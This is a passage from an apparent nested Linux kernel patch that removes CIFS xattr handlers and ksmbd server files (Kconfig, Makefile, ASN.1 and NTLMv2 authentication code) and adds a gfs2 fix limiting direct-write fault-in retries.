+- * longer secure and was replaced by SMB2/SMB3 a long time ago, and
+- * SMB3 and later are highly secure.
+- */
+-static const struct xattr_handler smb3_ntsd_xattr_handler = {
+-	.name = SMB3_XATTR_CIFS_NTSD,
+-	.flags = XATTR_CIFS_NTSD,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-static const struct xattr_handler cifs_cifs_ntsd_full_xattr_handler = {
+-	.name = CIFS_XATTR_CIFS_NTSD_FULL,
+-	.flags = XATTR_CIFS_NTSD_FULL,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-/*
+- * Although this is just an alias for the above, need to move away from
+- * confusing users and using the 20 year old term 'cifs' when it is no
+- * longer secure and was replaced by SMB2/SMB3 a long time ago, and
+- * SMB3 and later are highly secure.
+- */
+-static const struct xattr_handler smb3_ntsd_full_xattr_handler = {
+-	.name = SMB3_XATTR_CIFS_NTSD_FULL,
+-	.flags = XATTR_CIFS_NTSD_FULL,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-
+-static const struct xattr_handler cifs_posix_acl_access_xattr_handler = {
+-	.name = XATTR_NAME_POSIX_ACL_ACCESS,
+-	.flags = XATTR_ACL_ACCESS,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-static const struct xattr_handler cifs_posix_acl_default_xattr_handler = {
+-	.name = XATTR_NAME_POSIX_ACL_DEFAULT,
+-	.flags = XATTR_ACL_DEFAULT,
+-	.get = cifs_xattr_get,
+-	.set = cifs_xattr_set,
+-};
+-
+-const struct xattr_handler *cifs_xattr_handlers[] = {
+-	&cifs_user_xattr_handler,
+-	&cifs_os2_xattr_handler,
+-	&cifs_cifs_acl_xattr_handler,
+-	&smb3_acl_xattr_handler, /* alias for above since avoiding "cifs" */
+-	&cifs_cifs_ntsd_xattr_handler,
+-	&smb3_ntsd_xattr_handler, /* alias for above since avoiding "cifs" */
+-	&cifs_cifs_ntsd_full_xattr_handler,
+-	&smb3_ntsd_full_xattr_handler, /* alias for above since avoiding "cifs" */
+-	&cifs_posix_acl_access_xattr_handler,
+-	&cifs_posix_acl_default_xattr_handler,
+-	NULL
+-};
+diff --git a/fs/gfs2/file.c b/fs/gfs2/file.c
+index 60c6fb91fb589..bc6cd5f4b1077 100644
+--- a/fs/gfs2/file.c
++++ b/fs/gfs2/file.c
+@@ -783,9 +783,13 @@ static inline bool should_fault_in_pages(struct iov_iter *i,
+ 	if (!user_backed_iter(i))
+ 		return false;
+ 
++	/*
++	 * Try to fault in multiple pages initially.  When that doesn't result
++	 * in any progress, fall back to a single page.
++	 */
+ 	size = PAGE_SIZE;
+ 	offs = offset_in_page(iocb->ki_pos);
+-	if (*prev_count != count || !*window_size) {
++	if (*prev_count != count) {
+ 		size_t nr_dirtied;
+ 
+ 		nr_dirtied = max(current->nr_dirtied_pause -
+@@ -869,6 +873,7 @@ static ssize_t gfs2_file_direct_write(struct kiocb *iocb, struct iov_iter *from,
+ 	struct gfs2_inode *ip = GFS2_I(inode);
+ 	size_t prev_count = 0, window_size = 0;
+ 	size_t written = 0;
++	bool enough_retries;
+ 	ssize_t ret;
+ 
+ 	/*
+@@ -912,11 +917,17 @@ retry:
+ 	if (ret > 0)
+ 		written = ret;
+ 
++	enough_retries = prev_count == iov_iter_count(from) &&
++			 window_size <= PAGE_SIZE;
+ 	if (should_fault_in_pages(from, iocb, &prev_count, &window_size)) {
+ 		gfs2_glock_dq(gh);
+ 		window_size -= fault_in_iov_iter_readable(from, window_size);
+-		if (window_size)
+-			goto retry;
++		if (window_size) {
++			if (!enough_retries)
++				goto retry;
++			/* fall back to buffered I/O */
++			ret = 0;
++		}
+ 	}
+ out_unlock:
+ 	if (gfs2_holder_queued(gh))
+diff --git a/fs/ksmbd/Kconfig b/fs/ksmbd/Kconfig
+deleted file mode 100644
+index e1fe17747ed69..0000000000000
+--- a/fs/ksmbd/Kconfig
++++ /dev/null
+@@ -1,68 +0,0 @@
+-config SMB_SERVER
+-	tristate "SMB3 server support (EXPERIMENTAL)"
+-	depends on INET
+-	depends on MULTIUSER
+-	depends on FILE_LOCKING
+-	select NLS
+-	select NLS_UTF8
+-	select CRYPTO
+-	select CRYPTO_MD5
+-	select CRYPTO_HMAC
+-	select CRYPTO_ECB
+-	select CRYPTO_LIB_DES
+-	select CRYPTO_SHA256
+-	select CRYPTO_CMAC
+-	select CRYPTO_SHA512
+-	select CRYPTO_AEAD2
+-	select CRYPTO_CCM
+-	select CRYPTO_GCM
+-	select ASN1
+-	select OID_REGISTRY
+-	select CRC32
+-	default n
+-	help
+-	  Choose Y here if you want to allow SMB3 compliant clients
+-	  to access files residing on this system using SMB3 protocol.
+-	  To compile the SMB3 server support as a module,
+-	  choose M here: the module will be called ksmbd.
+-
+-	  You may choose to use a samba server instead, in which
+-	  case you can choose N here.
+-
+-	  You also need to install user space programs which can be found
+-	  in ksmbd-tools, available from
+-	  https://github.com/cifsd-team/ksmbd-tools.
+-	  More detail about how to run the ksmbd kernel server is
+-	  available via README file
+-	  (https://github.com/cifsd-team/ksmbd-tools/blob/master/README).
+-
+-	  ksmbd kernel server includes support for auto-negotiation,
+-	  Secure negotiate, Pre-authentication integrity, oplock/lease,
+-	  compound requests, multi-credit, packet signing, RDMA(smbdirect),
+-	  smb3 encryption, copy-offload, secure per-user session
+-	  establishment via NTLM or NTLMv2.
+-
+-config SMB_SERVER_SMBDIRECT
+-	bool "Support for SMB Direct protocol"
+-	depends on SMB_SERVER=m && INFINIBAND && INFINIBAND_ADDR_TRANS || SMB_SERVER=y && INFINIBAND=y && INFINIBAND_ADDR_TRANS=y
+-	select SG_POOL
+-	default n
+-
+-	help
+-	  Enables SMB Direct support for SMB 3.0, 3.02 and 3.1.1.
+-
+-	  SMB Direct allows transferring SMB packets over RDMA. If unsure,
+-	  say N.
+-
+-config SMB_SERVER_CHECK_CAP_NET_ADMIN
+-	bool "Enable check network administration capability"
+-	depends on SMB_SERVER
+-	default y
+-
+-	help
+-	  Prevent unprivileged processes to start the ksmbd kernel server.
+-
+-config SMB_SERVER_KERBEROS5
+-	bool "Support for Kerberos 5"
+-	depends on SMB_SERVER
+-	default n
+diff --git a/fs/ksmbd/Makefile b/fs/ksmbd/Makefile
+deleted file mode 100644
+index 7d6337a7dee40..0000000000000
+--- a/fs/ksmbd/Makefile
++++ /dev/null
+@@ -1,20 +0,0 @@
+-# SPDX-License-Identifier: GPL-2.0-or-later
+-#
+-# Makefile for Linux SMB3 kernel server
+-#
+-obj-$(CONFIG_SMB_SERVER) += ksmbd.o
+-
+-ksmbd-y :=	unicode.o auth.o vfs.o vfs_cache.o server.o ndr.o \
+-		misc.o oplock.o connection.o ksmbd_work.o crypto_ctx.o \
+-		mgmt/ksmbd_ida.o mgmt/user_config.o mgmt/share_config.o \
+-		mgmt/tree_connect.o mgmt/user_session.o smb_common.o \
+-		transport_tcp.o transport_ipc.o smbacl.o smb2pdu.o \
+-		smb2ops.o smb2misc.o ksmbd_spnego_negtokeninit.asn1.o \
+-		ksmbd_spnego_negtokentarg.asn1.o asn1.o
+-
+-$(obj)/asn1.o: $(obj)/ksmbd_spnego_negtokeninit.asn1.h $(obj)/ksmbd_spnego_negtokentarg.asn1.h
+-
+-$(obj)/ksmbd_spnego_negtokeninit.asn1.o: $(obj)/ksmbd_spnego_negtokeninit.asn1.c $(obj)/ksmbd_spnego_negtokeninit.asn1.h
+-$(obj)/ksmbd_spnego_negtokentarg.asn1.o: $(obj)/ksmbd_spnego_negtokentarg.asn1.c $(obj)/ksmbd_spnego_negtokentarg.asn1.h
+-
+-ksmbd-$(CONFIG_SMB_SERVER_SMBDIRECT) += transport_rdma.o
+diff --git a/fs/ksmbd/asn1.c b/fs/ksmbd/asn1.c
+deleted file mode 100644
+index c03eba0903682..0000000000000
+--- a/fs/ksmbd/asn1.c
++++ /dev/null
+@@ -1,239 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- * The ASB.1/BER parsing code is derived from ip_nat_snmp_basic.c which was in
+- * turn derived from the gxsnmp package by Gregory McLean & Jochen Friedrich
+- *
+- * Copyright (c) 2000 RP Internet (www.rpi.net.au).
+- */
+-
+-#include <linux/module.h>
+-#include <linux/types.h>
+-#include <linux/kernel.h>
+-#include <linux/mm.h>
+-#include <linux/slab.h>
+-#include <linux/oid_registry.h>
+-
+-#include "glob.h"
+-
+-#include "asn1.h"
+-#include "connection.h"
+-#include "auth.h"
+-#include "ksmbd_spnego_negtokeninit.asn1.h"
+-#include "ksmbd_spnego_negtokentarg.asn1.h"
+-
+-#define NTLMSSP_OID_LEN  10
+-
+-static char NTLMSSP_OID_STR[NTLMSSP_OID_LEN] = { 0x2b, 0x06, 0x01, 0x04, 0x01,
+-	0x82, 0x37, 0x02, 0x02, 0x0a };
+-
+-int
+-ksmbd_decode_negTokenInit(unsigned char *security_blob, int length,
+-			  struct ksmbd_conn *conn)
+-{
+-	return asn1_ber_decoder(&ksmbd_spnego_negtokeninit_decoder, conn,
+-				security_blob, length);
+-}
+-
+-int
+-ksmbd_decode_negTokenTarg(unsigned char *security_blob, int length,
+-			  struct ksmbd_conn *conn)
+-{
+-	return asn1_ber_decoder(&ksmbd_spnego_negtokentarg_decoder, conn,
+-				security_blob, length);
+-}
+-
+-static int compute_asn_hdr_len_bytes(int len)
+-{
+-	if (len > 0xFFFFFF)
+-		return 4;
+-	else if (len > 0xFFFF)
+-		return 3;
+-	else if (len > 0xFF)
+-		return 2;
+-	else if (len > 0x7F)
+-		return 1;
+-	else
+-		return 0;
+-}
+-
+-static void encode_asn_tag(char *buf, unsigned int *ofs, char tag, char seq,
+-			   int length)
+-{
+-	int i;
+-	int index = *ofs;
+-	char hdr_len = compute_asn_hdr_len_bytes(length);
+-	int len = length + 2 + hdr_len;
+-
+-	/* insert tag */
+-	buf[index++] = tag;
+-
+-	if (!hdr_len) {
+-		buf[index++] = len;
+-	} else {
+-		buf[index++] = 0x80 | hdr_len;
+-		for (i = hdr_len - 1; i >= 0; i--)
+-			buf[index++] = (len >> (i * 8)) & 0xFF;
+-	}
+-
+-	/* insert seq */
+-	len = len - (index - *ofs);
+-	buf[index++] = seq;
+-
+-	if (!hdr_len) {
+-		buf[index++] = len;
+-	} else {
+-		buf[index++] = 0x80 | hdr_len;
+-		for (i = hdr_len - 1; i >= 0; i--)
+-			buf[index++] = (len >> (i * 8)) & 0xFF;
+-	}
+-
+-	*ofs += (index - *ofs);
+-}
+-
+-int build_spnego_ntlmssp_neg_blob(unsigned char **pbuffer, u16 *buflen,
+-				  char *ntlm_blob, int ntlm_blob_len)
+-{
+-	char *buf;
+-	unsigned int ofs = 0;
+-	int neg_result_len = 4 + compute_asn_hdr_len_bytes(1) * 2 + 1;
+-	int oid_len = 4 + compute_asn_hdr_len_bytes(NTLMSSP_OID_LEN) * 2 +
+-		NTLMSSP_OID_LEN;
+-	int ntlmssp_len = 4 + compute_asn_hdr_len_bytes(ntlm_blob_len) * 2 +
+-		ntlm_blob_len;
+-	int total_len = 4 + compute_asn_hdr_len_bytes(neg_result_len +
+-			oid_len + ntlmssp_len) * 2 +
+-			neg_result_len + oid_len + ntlmssp_len;
+-
+-	buf = kmalloc(total_len, GFP_KERNEL);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	/* insert main gss header */
+-	encode_asn_tag(buf, &ofs, 0xa1, 0x30, neg_result_len + oid_len +
+-			ntlmssp_len);
+-
+-	/* insert neg result */
+-	encode_asn_tag(buf, &ofs, 0xa0, 0x0a, 1);
+-	buf[ofs++] = 1;
+-
+-	/* insert oid */
+-	encode_asn_tag(buf, &ofs, 0xa1, 0x06, NTLMSSP_OID_LEN);
+-	memcpy(buf + ofs, NTLMSSP_OID_STR, NTLMSSP_OID_LEN);
+-	ofs += NTLMSSP_OID_LEN;
+-
+-	/* insert response token - ntlmssp blob */
+-	encode_asn_tag(buf, &ofs, 0xa2, 0x04, ntlm_blob_len);
+-	memcpy(buf + ofs, ntlm_blob, ntlm_blob_len);
+-	ofs += ntlm_blob_len;
+-
+-	*pbuffer = buf;
+-	*buflen = total_len;
+-	return 0;
+-}
+-
+-int build_spnego_ntlmssp_auth_blob(unsigned char **pbuffer, u16 *buflen,
+-				   int neg_result)
+-{
+-	char *buf;
+-	unsigned int ofs = 0;
+-	int neg_result_len = 4 + compute_asn_hdr_len_bytes(1) * 2 + 1;
+-	int total_len = 4 + compute_asn_hdr_len_bytes(neg_result_len) * 2 +
+-		neg_result_len;
+-
+-	buf = kmalloc(total_len, GFP_KERNEL);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	/* insert main gss header */
+-	encode_asn_tag(buf, &ofs, 0xa1, 0x30, neg_result_len);
+-
+-	/* insert neg result */
+-	encode_asn_tag(buf, &ofs, 0xa0, 0x0a, 1);
+-	if (neg_result)
+-		buf[ofs++] = 2;
+-	else
+-		buf[ofs++] = 0;
+-
+-	*pbuffer = buf;
+-	*buflen = total_len;
+-	return 0;
+-}
+-
+-int ksmbd_gssapi_this_mech(void *context, size_t hdrlen, unsigned char tag,
+-			   const void *value, size_t vlen)
+-{
+-	enum OID oid;
+-
+-	oid = look_up_OID(value, vlen);
+-	if (oid != OID_spnego) {
+-		char buf[50];
+-
+-		sprint_oid(value, vlen, buf, sizeof(buf));
+-		ksmbd_debug(AUTH, "Unexpected OID: %s\n", buf);
+-		return -EBADMSG;
+-	}
+-
+-	return 0;
+-}
+-
+-int ksmbd_neg_token_init_mech_type(void *context, size_t hdrlen,
+-				   unsigned char tag, const void *value,
+-				   size_t vlen)
+-{
+-	struct ksmbd_conn *conn = context;
+-	enum OID oid;
+-	int mech_type;
+-
+-	oid = look_up_OID(value, vlen);
+-	if (oid == OID_ntlmssp) {
+-		mech_type = KSMBD_AUTH_NTLMSSP;
+-	} else if (oid == OID_mskrb5) {
+-		mech_type = KSMBD_AUTH_MSKRB5;
+-	} else if (oid == OID_krb5) {
+-		mech_type = KSMBD_AUTH_KRB5;
+-	} else if (oid == OID_krb5u2u) {
+-		mech_type = KSMBD_AUTH_KRB5U2U;
+-	} else {
+-		char buf[50];
+-
+-		sprint_oid(value, vlen, buf, sizeof(buf));
+-		ksmbd_debug(AUTH, "Unexpected OID: %s\n", buf);
+-		return -EBADMSG;
+-	}
+-
+-	conn->auth_mechs |= mech_type;
+-	if (conn->preferred_auth_mech == 0)
+-		conn->preferred_auth_mech = mech_type;
+-
+-	return 0;
+-}
+-
+-int ksmbd_neg_token_init_mech_token(void *context, size_t hdrlen,
+-				    unsigned char tag, const void *value,
+-				    size_t vlen)
+-{
+-	struct ksmbd_conn *conn = context;
+-
+-	conn->mechToken = kmalloc(vlen + 1, GFP_KERNEL);
+-	if (!conn->mechToken)
+-		return -ENOMEM;
+-
+-	memcpy(conn->mechToken, value, vlen);
+-	conn->mechToken[vlen] = '\0';
+-	return 0;
+-}
+-
+-int ksmbd_neg_token_targ_resp_token(void *context, size_t hdrlen,
+-				    unsigned char tag, const void *value,
+-				    size_t vlen)
+-{
+-	struct ksmbd_conn *conn = context;
+-
+-	conn->mechToken = kmalloc(vlen + 1, GFP_KERNEL);
+-	if (!conn->mechToken)
+-		return -ENOMEM;
+-
+-	memcpy(conn->mechToken, value, vlen);
+-	conn->mechToken[vlen] = '\0';
+-	return 0;
+-}
+diff --git a/fs/ksmbd/asn1.h b/fs/ksmbd/asn1.h
+deleted file mode 100644
+index ce105f4ce305a..0000000000000
+--- a/fs/ksmbd/asn1.h
++++ /dev/null
+@@ -1,21 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- * The ASB.1/BER parsing code is derived from ip_nat_snmp_basic.c which was in
+- * turn derived from the gxsnmp package by Gregory McLean & Jochen Friedrich
+- *
+- * Copyright (c) 2000 RP Internet (www.rpi.net.au).
+- * Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __ASN1_H__
+-#define __ASN1_H__
+-
+-int ksmbd_decode_negTokenInit(unsigned char *security_blob, int length,
+-			      struct ksmbd_conn *conn);
+-int ksmbd_decode_negTokenTarg(unsigned char *security_blob, int length,
+-			      struct ksmbd_conn *conn);
+-int build_spnego_ntlmssp_neg_blob(unsigned char **pbuffer, u16 *buflen,
+-				  char *ntlm_blob, int ntlm_blob_len);
+-int build_spnego_ntlmssp_auth_blob(unsigned char **pbuffer, u16 *buflen,
+-				   int neg_result);
+-#endif /* __ASN1_H__ */
+diff --git a/fs/ksmbd/auth.c b/fs/ksmbd/auth.c
+deleted file mode 100644
+index df8fb076f6f14..0000000000000
+--- a/fs/ksmbd/auth.c
++++ /dev/null
+@@ -1,1206 +0,0 @@
+-// SPDX-License-Identifier: GPL-2.0-or-later
+-/*
+- *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
+- *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
+- */
+-
+-#include <linux/kernel.h>
+-#include <linux/fs.h>
+-#include <linux/uaccess.h>
+-#include <linux/backing-dev.h>
+-#include <linux/writeback.h>
+-#include <linux/uio.h>
+-#include <linux/xattr.h>
+-#include <crypto/hash.h>
+-#include <crypto/aead.h>
+-#include <linux/random.h>
+-#include <linux/scatterlist.h>
+-
+-#include "auth.h"
+-#include "glob.h"
+-
+-#include <linux/fips.h>
+-#include <crypto/des.h>
+-
+-#include "server.h"
+-#include "smb_common.h"
+-#include "connection.h"
+-#include "mgmt/user_session.h"
+-#include "mgmt/user_config.h"
+-#include "crypto_ctx.h"
+-#include "transport_ipc.h"
+-#include "../smbfs_common/arc4.h"
+-
+-/*
+- * Fixed format data defining GSS header and fixed string
+- * "not_defined_in_RFC4178@please_ignore".
+- * So sec blob data in neg phase could be generated statically.
+- */
+-static char NEGOTIATE_GSS_HEADER[AUTH_GSS_LENGTH] = {
+-#ifdef CONFIG_SMB_SERVER_KERBEROS5
+-	0x60, 0x5e, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05,
+-	0x05, 0x02, 0xa0, 0x54, 0x30, 0x52, 0xa0, 0x24,
+-	0x30, 0x22, 0x06, 0x09, 0x2a, 0x86, 0x48, 0x86,
+-	0xf7, 0x12, 0x01, 0x02, 0x02, 0x06, 0x09, 0x2a,
+-	0x86, 0x48, 0x82, 0xf7, 0x12, 0x01, 0x02, 0x02,
+-	0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04, 0x01, 0x82,
+-	0x37, 0x02, 0x02, 0x0a, 0xa3, 0x2a, 0x30, 0x28,
+-	0xa0, 0x26, 0x1b, 0x24, 0x6e, 0x6f, 0x74, 0x5f,
+-	0x64, 0x65, 0x66, 0x69, 0x6e, 0x65, 0x64, 0x5f,
+-	0x69, 0x6e, 0x5f, 0x52, 0x46, 0x43, 0x34, 0x31,
+-	0x37, 0x38, 0x40, 0x70, 0x6c, 0x65, 0x61, 0x73,
+-	0x65, 0x5f, 0x69, 0x67, 0x6e, 0x6f, 0x72, 0x65
+-#else
+-	0x60, 0x48, 0x06, 0x06, 0x2b, 0x06, 0x01, 0x05,
+-	0x05, 0x02, 0xa0, 0x3e, 0x30, 0x3c, 0xa0, 0x0e,
+-	0x30, 0x0c, 0x06, 0x0a, 0x2b, 0x06, 0x01, 0x04,
+-	0x01, 0x82, 0x37, 0x02, 0x02, 0x0a, 0xa3, 0x2a,
+-	0x30, 0x28, 0xa0, 0x26, 0x1b, 0x24, 0x6e, 0x6f,
+-	0x74, 0x5f, 0x64, 0x65, 0x66, 0x69, 0x6e, 0x65,
+-	0x64, 0x5f, 0x69, 0x6e, 0x5f, 0x52, 0x46, 0x43,
+-	0x34, 0x31, 0x37, 0x38, 0x40, 0x70, 0x6c, 0x65,
+-	0x61, 0x73, 0x65, 0x5f, 0x69, 0x67, 0x6e, 0x6f,
+-	0x72, 0x65
+-#endif
+-};
+-
+-void ksmbd_copy_gss_neg_header(void *buf)
+-{
+-	memcpy(buf, NEGOTIATE_GSS_HEADER, AUTH_GSS_LENGTH);
+-}
+-
+-/**
+- * ksmbd_gen_sess_key() - function to generate session key
+- * @sess:	session of connection
+- * @hash:	source hash value to be used for find session key
+- * @hmac:	source hmac value to be used for finding session key
+- *
+- */
+-static int ksmbd_gen_sess_key(struct ksmbd_session *sess, char *hash,
+-			      char *hmac)
+-{
+-	struct ksmbd_crypto_ctx *ctx;
+-	int rc;
+-
+-	ctx = ksmbd_crypto_ctx_find_hmacmd5();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
+-		return -ENOMEM;
+-	}
+-
+-	rc = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
+-				 hash,
+-				 CIFS_HMAC_MD5_HASH_SIZE);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "hmacmd5 set key fail error %d\n", rc);
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_init(CRYPTO_HMACMD5(ctx));
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not init hmacmd5 error %d\n", rc);
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_update(CRYPTO_HMACMD5(ctx),
+-				 hmac,
+-				 SMB2_NTLMV2_SESSKEY_SIZE);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not update with response error %d\n", rc);
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_final(CRYPTO_HMACMD5(ctx), sess->sess_key);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not generate hmacmd5 hash error %d\n", rc);
+-		goto out;
+-	}
+-
+-out:
+-	ksmbd_release_crypto_ctx(ctx);
+-	return rc;
+-}
+-
+-static int calc_ntlmv2_hash(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+-			    char *ntlmv2_hash, char *dname)
+-{
+-	int ret, len, conv_len;
+-	wchar_t *domain = NULL;
+-	__le16 *uniname = NULL;
+-	struct ksmbd_crypto_ctx *ctx;
+-
+-	ctx = ksmbd_crypto_ctx_find_hmacmd5();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "can't generate ntlmv2 hash\n");
+-		return -ENOMEM;
+-	}
+-
+-	ret = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
+-				  user_passkey(sess->user),
+-				  CIFS_ENCPWD_SIZE);
+-	if (ret) {
+-		ksmbd_debug(AUTH, "Could not set NT Hash as a key\n");
+-		goto out;
+-	}
+-
+-	ret = crypto_shash_init(CRYPTO_HMACMD5(ctx));
+-	if (ret) {
+-		ksmbd_debug(AUTH, "could not init hmacmd5\n");
+-		goto out;
+-	}
+-
+-	/* convert user_name to unicode */
+-	len = strlen(user_name(sess->user));
+-	uniname = kzalloc(2 + UNICODE_LEN(len), GFP_KERNEL);
+-	if (!uniname) {
+-		ret = -ENOMEM;
+-		goto out;
+-	}
+-
+-	conv_len = smb_strtoUTF16(uniname, user_name(sess->user), len,
+-				  conn->local_nls);
+-	if (conv_len < 0 || conv_len > len) {
+-		ret = -EINVAL;
+-		goto out;
+-	}
+-	UniStrupr(uniname);
+-
+-	ret = crypto_shash_update(CRYPTO_HMACMD5(ctx),
+-				  (char *)uniname,
+-				  UNICODE_LEN(conv_len));
+-	if (ret) {
+-		ksmbd_debug(AUTH, "Could not update with user\n");
+-		goto out;
+-	}
+-
+-	/* Convert domain name or conn name to unicode and uppercase */
+-	len = strlen(dname);
+-	domain = kzalloc(2 + UNICODE_LEN(len), GFP_KERNEL);
+-	if (!domain) {
+-		ret = -ENOMEM;
+-		goto out;
+-	}
+-
+-	conv_len = smb_strtoUTF16((__le16 *)domain, dname, len,
+-				  conn->local_nls);
+-	if (conv_len < 0 || conv_len > len) {
+-		ret = -EINVAL;
+-		goto out;
+-	}
+-
+-	ret = crypto_shash_update(CRYPTO_HMACMD5(ctx),
+-				  (char *)domain,
+-				  UNICODE_LEN(conv_len));
+-	if (ret) {
+-		ksmbd_debug(AUTH, "Could not update with domain\n");
+-		goto out;
+-	}
+-
+-	ret = crypto_shash_final(CRYPTO_HMACMD5(ctx), ntlmv2_hash);
+-	if (ret)
+-		ksmbd_debug(AUTH, "Could not generate md5 hash\n");
+-out:
+-	kfree(uniname);
+-	kfree(domain);
+-	ksmbd_release_crypto_ctx(ctx);
+-	return ret;
+-}
+-
+-/**
+- * ksmbd_auth_ntlmv2() - NTLMv2 authentication handler
+- * @sess:	session of connection
+- * @ntlmv2:		NTLMv2 challenge response
+- * @blen:		NTLMv2 blob length
+- * @domain_name:	domain name
+- *
+- * Return:	0 on success, error number on error
+- */
+-int ksmbd_auth_ntlmv2(struct ksmbd_conn *conn, struct ksmbd_session *sess,
+-		      struct ntlmv2_resp *ntlmv2, int blen, char *domain_name,
+-		      char *cryptkey)
+-{
+-	char ntlmv2_hash[CIFS_ENCPWD_SIZE];
+-	char ntlmv2_rsp[CIFS_HMAC_MD5_HASH_SIZE];
+-	struct ksmbd_crypto_ctx *ctx = NULL;
+-	char *construct = NULL;
+-	int rc, len;
+-
+-	rc = calc_ntlmv2_hash(conn, sess, ntlmv2_hash, domain_name);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "could not get v2 hash rc %d\n", rc);
+-		goto out;
+-	}
+-
+-	ctx = ksmbd_crypto_ctx_find_hmacmd5();
+-	if (!ctx) {
+-		ksmbd_debug(AUTH, "could not crypto alloc hmacmd5\n");
+-		return -ENOMEM;
+-	}
+-
+-	rc = crypto_shash_setkey(CRYPTO_HMACMD5_TFM(ctx),
+-				 ntlmv2_hash,
+-				 CIFS_HMAC_MD5_HASH_SIZE);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not set NTLMV2 Hash as a key\n");
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_init(CRYPTO_HMACMD5(ctx));
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not init hmacmd5\n");
+-		goto out;
+-	}
+-
+-	len = CIFS_CRYPTO_KEY_SIZE + blen;
+-	construct = kzalloc(len, GFP_KERNEL);
+-	if (!construct) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	memcpy(construct, cryptkey, CIFS_CRYPTO_KEY_SIZE);
+-	memcpy(construct + CIFS_CRYPTO_KEY_SIZE, &ntlmv2->blob_signature, blen);
+-
+-	rc = crypto_shash_update(CRYPTO_HMACMD5(ctx), construct, len);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not update with response\n");
+-		goto out;
+-	}
+-
+-	rc = crypto_shash_final(CRYPTO_HMACMD5(ctx), ntlmv2_rsp);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not generate md5 hash\n");
+-		goto out;
+-	}
+-	ksmbd_release_crypto_ctx(ctx);
+-	ctx = NULL;
+-
+-	rc = ksmbd_gen_sess_key(sess, ntlmv2_hash, ntlmv2_rsp);
+-	if (rc) {
+-		ksmbd_debug(AUTH, "Could not generate sess key\n");
+-		goto out;
+-	}
+-
+-	if (memcmp(ntlmv2->ntlmv2_hash, ntlmv2_rsp, CIFS_HMAC_MD5_HASH_SIZE) != 0)
+-		rc = -EINVAL;
+-out:
+-	if (ctx)
+-		ksmbd_release_crypto_ctx(ctx);
+-	kfree(construct);
+-	return rc;
+-}
+-
+-/**
+- * ksmbd_decode_ntlmssp_auth_blob() - helper function to construct
+- * authenticate blob
+- * @authblob:	authenticate blob source pointer
+- * @usr:	user details
+- * @sess:	session of connection
+- *
+- * Return:	0 on success, error number on error
+- */
+-int ksmbd_decode_ntlmssp_auth_blob(struct authenticate_message *authblob,
+-				   int blob_len, struct ksmbd_conn *conn,
+-				   struct ksmbd_session *sess)
+-{
+-	char *domain_name;
+-	unsigned int nt_off, dn_off;
+-	unsigned short nt_len, dn_len;
+-	int ret;
+-
+-	if (blob_len < sizeof(struct authenticate_message)) {
+-		ksmbd_debug(AUTH, "negotiate blob len %d too small\n",
+-			    blob_len);
+-		return -EINVAL;
+-	}
+-
+-	if (memcmp(authblob->Signature, "NTLMSSP", 8)) {
+-		ksmbd_debug(AUTH, "blob signature incorrect %s\n",
+-			    authblob->Signature);
+-		return -EINVAL;
+-	}
+-
+-	nt_off = le32_to_cpu(authblob->NtChallengeResponse.BufferOffset);
+-	nt_len = le16_to_cpu(authblob->NtChallengeResponse.Length);
+-	dn_off = le32_to_cpu(authblob->DomainName.BufferOffset);
+-	dn_len = le16_to_cpu(authblob->DomainName.Length);
+-
+-	if (blob_len < (u64)dn_off + dn_len || blob_len < (u64)nt_off + nt_len ||
+-	    nt_len < CIFS_ENCPWD_SIZE)
+-		return -EINVAL;
+-
+-	/* TODO : use domain name that imported from configuration file */
+-	domain_name = smb_strndup_from_utf16((const char *)authblob + dn_off,
+-					     dn_len, true, conn->local_nls);
+-	if (IS_ERR(domain_name))
+-		return PTR_ERR(domain_name);
+-
+-	/* process NTLMv2 authentication */
+-	ksmbd_debug(AUTH, "decode_ntlmssp_authenticate_blob dname%s\n",
+-		    domain_name);
+-	ret = ksmbd_auth_ntlmv2(conn, sess,
+-				(struct ntlmv2_resp *)((char *)authblob + nt_off),
+-				nt_len - CIFS_ENCPWD_SIZE,
+-				domain_name, conn->ntlmssp.cryptkey);
+-	kfree(domain_name);
+-
+-	/* The recovered secondary session key */
+-	if (conn->ntlmssp.client_flags & NTLMSSP_NEGOTIATE_KEY_XCH) {
+-		struct arc4_ctx *ctx_arc4;
+-		unsigned int sess_key_off, sess_key_len;
+-
+-		sess_key_off = le32_to_cpu(authblob->SessionKey.BufferOffset);
+-		sess_key_len = le16_to_cpu(authblob->SessionKey.Length);
+-
+-		if (blob_len < (u64)sess_key_off + sess_key_len)
+-			return -EINVAL;
+-
+-		ctx_arc4 = kmalloc(sizeof(*ctx_arc4), GFP_KERNEL);
+-		if (!ctx_arc4)
+-			return -ENOMEM;
+-
